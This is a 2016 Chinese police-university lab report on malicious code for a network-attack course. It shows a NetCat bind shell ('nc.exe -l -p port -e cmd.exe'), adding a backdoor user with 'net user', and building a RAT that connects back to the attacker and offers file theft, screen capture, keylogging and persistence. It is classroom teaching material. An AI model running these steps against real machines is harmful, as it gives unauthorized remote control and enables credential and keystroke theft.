惡意代碼技術第一二部分——P201421410029

學   號：201421410029

 

中國人民公安大學

Chinese people’ public security university

 

網絡對抗技術

實驗報告

 

實驗四

惡意代碼技術

 

 

 

學生姓名	李政浩
年級	2014
區隊	1
指導教師	高見老師

 

 

信息技術與網絡安全學院

2016年11月7日

 

實驗任務總綱

2016—2017 學年 第 一 學期

1、實驗目的

1．經過對木馬的練習，使讀者理解和掌握木馬傳播和運行的機制；經過手動刪除木馬，掌握檢查木馬和刪除木馬的技巧，學會防護木馬的相關知識，加深對木馬的安全防範意識。

 

2．瞭解並熟悉經常使用的網絡攻擊工具，木馬的基本功能；

3．達到鞏固課程知識和實際應用的目的。

2、實驗要求

1．認真閱讀每一個實驗內容，須要截圖的題目，需清晰截圖並對截圖進行標註和說明。

2．文檔要求結構清晰，圖文表達準確，標註規範。推理內容客觀、合理、邏輯性強。

3．軟件工具可以使用NC、MSF等。

4．實驗結束後，保留電子文檔。

3、實驗步驟

1．準備

提早作好實驗準備，實驗前應把詳細瞭解實驗目的、實驗要求和實驗內容，熟悉並準備好實驗用的軟件工具，按照實驗內容和要求提早作好實驗內容的準備。

2．實驗環境

描述實驗所使用的硬件和軟件環境（包括各類軟件工具）；

開機並啓動軟件office2003或200七、瀏覽器、加解密軟件。

3．實驗過程

1）啓動系統和啓動工具軟件環境。

2）用軟件工具實現實驗內容。

4．實驗報告

按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中，文檔按照規定的書寫格式書寫，表格要有表說圖形要有圖說。

 

任務一 利用NC控制電腦

 

 NetCat，具備網絡軍刀之稱，它小巧精悍且功能強大，說它小巧精悍，是由於他的軟件大小如今已經壓縮到只有十幾KB，並且在功能上絲絕不減。

 

實驗過程須要兩個同窗相互配合完成：

 被攻擊者：192.168.42.71

攻擊者：192.168.42.70

 

步驟一：

   在受害者的機器 （同窗A）
輸入下面的命令：
　　nc.exe -l -p port -e cmd.exe   進入監聽模式

 

 
步驟二：
　　在攻擊者的機器.（同窗B）
輸入下面的命令：
　　nc ip  port //鏈接victim_IP,而後獲得一個shell。 （須要截圖）

 

 

 

步驟三：

 

在shell中，利用net user 用戶名 密碼 /add ，添加一個用戶，並在受害者的機器中使用 net user 命令進行驗證。（須要截圖）

添加用戶slzh

密碼爲123

 

在被攻擊方查看user net

 

 

 能夠繼續經過命令行作一些事情。

 

任務二 利用木馬控制電腦

 

實驗過程須要兩個同窗配合：

 

步驟一：

 

   　攻擊者的機器. （同窗A）
打開V2014.exe程序或則star RAT，這兩個木馬功能相似。

 

 

 

步驟二：
　　點擊菜單欄中的「服務生成」，在彈出的配置服務端中，配置回連IP地址（攻擊者IP）和端口號，並點擊「生成」按鈕，生成木馬服務端。

 

 

步驟三：

 

將生成的木馬可執行程序拷貝到受害者的機器，並雙擊運行。 

 

步驟四：

 

在控制端中查看木立刻線狀況，並對如下功能每一個進行測試和截圖。 

 

1. 文件管理，嘗試拷貝文件

 

 

1. 屏幕控制，嘗試獲取桌面

 

1. 鍵盤記錄，嘗試獲取對方擊鍵記錄

 

1. 會話管理，重啓對方機器，查看是否能自啓動上線

 

會話管理，卸載對方的木馬。